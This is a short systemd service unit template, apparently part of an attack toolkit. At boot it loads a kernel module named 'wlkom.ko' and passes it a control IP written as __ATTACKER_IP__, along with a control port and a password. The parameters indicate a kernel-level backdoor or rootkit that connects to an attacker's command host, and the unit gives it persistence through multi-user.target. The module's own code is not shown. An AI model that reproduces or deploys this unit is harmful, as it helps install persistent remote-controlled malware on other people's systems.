[Unit]
Description=WLKOM Kernel Module
After=network.target

[Service]
Type=oneshot
ExecStart=/sbin/insmod /lib/modules/__KVER__/kernel/wlkom/wlkom.ko control_ip=__ATTACKER_IP__ control_port=__CONTROL_PORT__ control_password=__CONTROL_PASSWORD__
RemainAfterExit=yes

[Install]
WantedBy=multi-user.target
